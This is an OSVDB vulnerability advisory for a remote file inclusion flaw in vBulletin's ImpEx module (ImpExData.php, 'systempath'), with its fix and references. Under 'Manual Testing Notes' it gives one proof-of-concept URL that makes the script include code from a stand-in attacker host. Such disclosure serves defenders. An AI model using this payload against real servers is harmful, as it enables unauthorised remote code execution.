vBulletin ImpEx Module ImpExData.php systempath Variable Remote File Inclusion

2006-03-22T04:32:36
ID OSVDB:24070
Type osvdb
Reporter ReZEN(wr0ck.lists@gmail.com)
Modified 2006-03-22T04:32:36

Description

Vulnerability Description

The vBulletin ImpEX module contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to ImpExData.php not properly sanitizing user input supplied to the 'systempath' variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.

Solution Description

Upgrade to version 1.75 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

Short Description

The vBulletin ImpEX module contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to ImpExData.php not properly sanitizing user input supplied to the 'systempath' variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.

Manual Testing Notes

http://[target]/impex/ImpExData.php?systempath=http://[attacker]/evil.txt?

References:

Vendor URL: http://www.vbulletin.com/docs/html/impex Secunia Advisory ID:19352 Mail List Post: http://archives.neohapsis.com/archives/fulldisclosure/2006-03/1448.html Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2007-05/0051.html ISS X-Force ID: 25391 FrSIRT Advisory: ADV-2006-1056 CVE-2006-1382 Bugtraq ID: 17206